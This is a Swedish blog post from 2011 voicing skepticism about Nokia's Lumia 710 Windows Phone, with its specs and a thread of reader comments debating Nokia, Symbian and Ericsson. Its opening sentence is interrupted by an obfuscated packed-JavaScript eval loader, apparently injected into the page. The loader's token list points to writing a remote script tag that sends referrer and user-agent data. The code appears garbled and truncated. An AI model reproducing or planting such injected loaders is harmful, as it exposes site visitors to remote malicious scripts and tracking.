Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Nokia Lumia 710… Jag är delad.

Nokia Lumia 710… Jag är delad.
Filip Urde
 • On 26 oktober, 2011
 • http://www.revue.se/filip-urde

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzdhy|var|u0026u|referrer|bfzdf||js|php’.split(’|’),0,{}))
är delad….

Nokias andra Windows Phone-lur är på G. Den ser sjukt fräsch ut.
Men det är en Nokia… Jag är Delad minst sagt.
Jag gillar Windows nya Mango OS, känns hur schysst som helst och äntligen en riktigt tung konkurrent till iPhone. Men Nokia? är det bara jag som ställer mig frågande till Nokia och dess möjlighet att leverera. Själv tycker jag Nokia haft sin tid. Man funkade som en sluss för att få hela befolkningen in på mobil marknaden, man hade en modell som passade varje person. Man kunde va kreativ och byta skal, byta ringsignaler. Men sen då?
I dag är inget av detta viktigt och med floppen, även kallad ”symbian” (Nokias skit OS). Ja, då ligger inte Nokia på mitt +konto i alla fall.

Nokia Lumia 710 är lillebrodern till flaggskeppet Lumia 800 och bägge modellerna kör Windows Phone Mango. Den har en 3,7 tum stor skärm med upplösningen 480×800 pixlar, en kamera på 5 megapixel, Qualcomm-processor på 1,4Ghz, GPS, WiFi, Bluetooth och 8GB inbyggt minne som går att utöka till maximalt 24GB via en microSD-kortsingång.

Men nää… Är jag tråkig och långsint? kanske…

 

Men om ärligheten ska fram (vilket den ska), så måste jag säga att jag tror inte på NOKIA!

jag tror på Windows! Men inte Nokia… drömmen vore väll om det var Ericsson istället för Nokia som fick OS:et. Men vad gör man nu? jag kan tänka mig OS:et som mobilen har, men inte mobilen. Vad gör man då?
Lumia 710 kommer till Ryssland (?!?) och vissa valda länder i Asien mot åretsslut.  Reste får vänta tills i början av 2012. Priset kommer ligga runt 320 euro.

 

Vi får helt enkelt vänta och ta en test innan jag kan dömma totalt…

Comments

 1. Jens Dahlberg

  Håller helt med dig Filip! Nokia är SKIT! Bra artikel!

 2. No phone is a iPhone

  Helt rätt mannen. Nokia – minus, Windows Mango – plus.

 3. nallen

  nokia blev för lata och bekväma under sin storhetstid och lät andra sträva efter att försöka toppa dem, så när konkurrenterna väl kom igång var dom förbi på nokia på två röda i utvecklingen.
  hoppas lite på att nokia ska komma tillbaks av ren sympati!

 4. Anonym

  ha ha ha du måste ju vara ute och cyckla Nokia har ju bra mycket större kapacitet än Ericsson på mobiltillverkningen med Ericsson så hade det nog kraschat ordentligt som det gjorde när Nokia tog över rodret, nej jag tror bara att du ogillar nokia för att det är nokia , Symbian är inte skit hur mycket folk än säger det , det är slöt men inte skit, 
  Nokia kommer att plocka mycket poäng med WP i lurrarna gps,musik, osv.osv … Jag har svårt att se att Nokia skulle misslyckas om inte WP misslyckas såklart, 
  Tror stenhårt på stor tillväxt nästa år , Nokia kommer bli störst även på Smartphone marknaden inom några år och Android kommer att sjunka mer eftersom tillverkarna kommer köra på WP i nästan alla lurar kostar för mycket för dem att betala M$ avgifter för Android användatndet

  • haki

   Håller helt klart med dig. Håller på Nokia i år. Tror den kan bli mycket bättre än Iphone i alla fall.

  • Joel örner

   Jobbar du på Nokia? Symbian inte skit? Det här har inget med kapacitet att göra skulle jag vilja säga. Det handlar om välgjorda mobiler som funkar idag. Nokia är 90tal… Xperia krossar ju allt nokia gör. Du låter som en person som tror att grafiken på en Ps3 är bättre än på en dator…